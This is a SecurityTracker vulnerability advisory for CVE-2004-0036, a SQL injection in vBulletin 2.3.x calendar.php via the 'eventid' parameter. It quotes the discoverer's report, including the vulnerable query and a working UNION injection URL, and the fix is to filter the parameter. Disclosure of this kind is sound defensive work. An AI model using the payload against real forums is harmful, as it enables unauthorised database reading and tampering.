SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   vBulletin Vendors:   Jelsoft Enterprises
vBulletin Input Validation Flaw in calendar.php 'eventid' Field Permits SQL Injection
SecurityTracker Alert ID:  1008624
SecurityTracker URL:  http://securitytracker.com/id/1008624
CVE Reference:   CVE-2004-0036   (Links to External Site)
Updated:  Jan 9 2004
Original Entry Date:  Jan 7 2004
Impact:   Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 2.3.x
Description:   An input validation vulnerability was reported in vBulletin in 'calendar.php'. A remote user can inject SQL commands.

mslug reported that the 'eventid' field is not properly validated. A remote user can reportedly submit a specially crafted URL to execute SQL commands on the underlying database.

A demonstration exploit to add an event (#14) is provided:

calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events WHERE eventid = 14) order by eventdate

Impact:   A remote user can execute arbitrary SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.vbulletin.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  vBulletin Forum 2.3.xx calendar.php SQL Injection


vBulletin Forum 2.3.xx calendar.php SQL Injection
========================================================
Website: www.safechina.net
Discovered by: mslug (a1476854@hotmail.com)

Description:
=============
There exist a sql injection problem in calendar.php. Notice the eventid 
field.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
      $eventinfo = $DB_site->query_first("SELECT 
allowsmilies,public,userid,eventdate,event,subject FROM calendar_events 
WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

Exploit request
================
calendar.php?s=&action=edit&eventid=14 union (SELECT 
allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events 
WHERE eventid = 14) order by eventdate

(14 is the eventid of your added event)

The subject and event field will show the result.

The query_first function will only return the first row of the query result, 
so make sure it returns the
one you want.

The Fix?
============
filter eventid before query.


Disclaimer:
===========
The author is not responsible for the misuse of the information
provided in this advisory. The opinions expressed are my own and not of
any company. In no event shall the author be liable for any damages
whatsoever arising out of or in connection with the use or spread of this
advisory. Any use of the information is at the user's own risk.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

_________________________________________________________________
Protect your PC - get McAfee.com VirusScan Online 
http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC